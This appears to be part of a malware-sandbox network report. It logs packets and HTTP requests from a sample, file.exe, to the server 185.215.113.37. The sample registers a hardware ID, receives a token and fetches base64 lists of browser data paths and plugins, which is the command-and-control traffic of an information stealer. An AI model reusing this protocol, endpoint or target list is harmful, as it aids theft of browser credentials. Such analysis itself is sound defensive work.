Sep 28, 2024 21:26:18.656280994 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656280994 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656305075 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656894922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656907082 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656917095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656925917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656938076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656948090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656955004 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656959057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656971931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656975985 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656984091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656996012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657006025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657006025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.657020092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657030106 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.657032013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657043934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657047987 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.657056093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657068968 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.657069921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657084942 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.657171011 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.657500982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657511950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657521963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657535076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657545090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657553911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657555103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.657555103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.657566071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657578945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.657603025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.657649040 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.705780983 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.710649014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928431988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928452015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928464890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928494930 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.928560972 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.928769112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928781033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928792000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928802967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928814888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928817034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.928828001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928842068 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.928893089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.928893089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.928909063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928920031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928930044 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928941965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928952932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928955078 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.928972960 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.928982019 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929002047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929030895 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929222107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929233074 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929241896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929253101 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929265022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929266930 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929275990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929286957 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929299116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929315090 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929315090 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929347992 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929377079 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929770947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929783106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929794073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929820061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929856062 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929934978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929945946 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929955006 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929965019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929975033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929985046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.929985046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.929996967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930008888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930011988 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930018902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930030107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930030107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930042028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930052996 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930053949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930067062 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930075884 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930093050 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930111885 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930438042 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930448055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930459023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930469990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930475950 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930510044 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930510044 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930572033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930583954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930619955 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930757999 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930768967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930778027 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930789948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930795908 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930799961 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930811882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930819035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930821896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930835009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930843115 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930856943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930859089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930869102 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930880070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930880070 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930891037 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930898905 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930903912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930917025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930927038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930927038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930928946 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930941105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930952072 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930953026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930963993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.930965900 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.930991888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.931014061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.931416035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.931436062 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.931447029 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.931456089 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.931467056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.931473017 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.931473017 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.931478977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.931490898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.931503057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.931510925 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.931510925 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.931545973 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.931545973 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:19.418040991 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:19.418078899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:19.423067093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:19.423082113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:20.144702911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:20.144781113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:20.611637115 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:20.616528034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:20.837271929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:20.837348938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:20.837358952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:20.837399960 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:20.839437962 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:20.844245911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:21.064023972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:21.064095020 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:21.076345921 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:21.081218004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:21.794778109 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:21.794846058 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:21.822144032 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:22.038800955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:22.267699003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:22.267713070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:22.267724991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:22.267798901 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:22.269021034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:22.274120092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:22.992638111 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:22.993998051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:26.986797094 CEST	49732	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	185.215.113.37	80	7076	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 21:26:06.326740980 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 21:26:07.046447992 CEST	203	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 21:26:07.049501896 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHI Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 41 43 37 46 35 32 31 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="hwid"ADBAC7F521363848468766------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="build"save------JJDBAEHIJKJKEBFIEGHI--
Sep 28, 2024 21:26:07.289165974 CEST	407	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:07 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 7a 6c 6b 5a 44 5a 68 4f 57 55 78 5a 54 4d 77 4e 6d 55 31 5a 54 41 33 4d 44 41 32 59 7a 51 78 4d 6a 4e 6a 5a 6a 41 30 4f 47 51 31 59 7a 4a 68 4e 6a 5a 69 5a 6a 4d 34 5a 6d 49 33 4f 47 4d 32 5a 6a 46 6c 5a 44 42 6b 4e 54 63 7a 4d 7a 55 33 5a 54 59 30 4d 7a 55 79 4d 47 4d 78 59 32 4d 79 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: YzlkZDZhOWUxZTMwNmU1ZTA3MDA2YzQxMjNjZjA0OGQ1YzJhNjZiZjM4ZmI3OGM2ZjFlZDBkNTczMzU3ZTY0MzUyMGMxY2MyfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 28, 2024 21:26:07.290441990 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="message"browsers------KKJDGDHIDBGIECBGHJDB--
Sep 28, 2024 21:26:07.516190052 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:07 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 28, 2024 21:26:07.516303062 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 28, 2024 21:26:07.517846107 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFC Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 2d 2d 0d 0a Data Ascii: ------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="message"plugins------CBGCBKFBGIIIECAAAKFC--
